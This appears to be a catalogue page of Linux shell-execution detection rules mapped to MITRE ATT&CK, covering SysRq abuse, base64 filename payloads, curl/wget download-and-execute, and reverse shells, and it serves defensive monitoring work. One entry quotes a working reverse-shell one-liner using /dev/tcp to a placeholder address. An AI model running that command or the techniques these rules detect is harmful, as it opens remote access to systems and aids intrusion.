attack.t1059.004

Potential Abuse of Linux Magic System Request Key

Dec 8, 2025 · attack.execution attack.t1059.004 attack.impact attack.t1529 attack.t1489 attack.t1499 ·

Detects the potential abuse of the Linux Magic SysRq (System Request) key by adversaries with root or sufficient privileges to silently manipulate or destabilize a system. By writing to /proc/sysrq-trigger, they can crash the system, kill processes, or disrupt forensic analysis—all while bypassing standard logging. Though intended for recovery and debugging, SysRq can be misused as a stealthy post-exploitation tool. It is controlled via /proc/sys/kernel/sysrq or permanently through /etc/sysctl.conf.

Suspicious Commands Linux

Dec 8, 2025 · attack.execution attack.t1059.004 ·

Share on:

Detects relevant commands often related to malware or hacking activity

Suspicious Filename with Embedded Base64 Commands

Nov 24, 2025 · attack.execution attack.t1059.004 attack.defense-evasion attack.t1027 ·

Share on:

Detects files with specially crafted filenames that embed Base64-encoded bash payloads designed to execute when processed by shell scripts. These filenames exploit shell interpretation quirks to trigger hidden commands, a technique observed in VShell malware campaigns.

JexBoss Command Sequence

Nov 24, 2025 · attack.execution attack.t1059.004 ·

Share on:

Detects suspicious command sequence that JexBoss

Suspicious Download and Execute Pattern via Curl/Wget

Jun 25, 2025 · attack.execution attack.t1059.004 attack.t1203 ·

Share on:

Detects suspicious use of command-line tools such as curl or wget to download remote content - particularly scripts - into temporary directories (e.g., /dev/shm, /tmp), followed by immediate execution, indicating potential malicious activity. This pattern is commonly used by malicious scripts, stagers, or downloaders in fileless or multi-stage Linux attacks.

AWS EC2 Startup Shell Script Change

Aug 12, 2024 · attack.execution attack.t1059.001 attack.t1059.003 attack.t1059.004 ·

Share on:

Detects changes to the EC2 instance startup script. The shell script will be executed as root/SYSTEM every time the specific instances are booted up.

BPFtrace Unsafe Option Usage

Aug 12, 2024 · attack.execution attack.t1059.004 ·

Share on:

Detects the usage of the unsafe bpftrace option

Equation Group Indicators

Aug 12, 2024 · attack.execution attack.g0020 attack.t1059.004 ·

Share on:

Detects suspicious shell commands used in various Equation Group scripts and tools

Interactive Bash Suspicious Children

Aug 12, 2024 · attack.execution attack.defense-evasion attack.t1059.004 attack.t1036 ·

Share on:

Detects suspicious interactive bash as a parent to rather uncommon child processes

Linux Reverse Shell Indicator

Aug 12, 2024 · attack.execution attack.t1059.004 ·

Share on:

Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')

Nohup Execution

Aug 12, 2024 · attack.execution attack.t1059.004 ·

Share on:

Detects usage of nohup which could be leveraged by an attacker to keep a process running or break out from restricted environments

Suspicious Activity in Shell Commands

Aug 12, 2024 · attack.execution attack.t1059.004 ·

Share on:

Detects suspicious shell commands used in various exploit codes (see references)

Suspicious Reverse Shell Command Line

Aug 12, 2024 · attack.execution attack.t1059.004 ·

Share on:

Detects suspicious shell commands or program code that may be executed or used in command line to establish a reverse shell

Privilege Escalation Preparation

Apr 21, 2023 · attack.execution attack.t1059.004 ·

Share on:

Detects suspicious shell commands indicating the information gathering phase as preparation for the Privilege Escalation.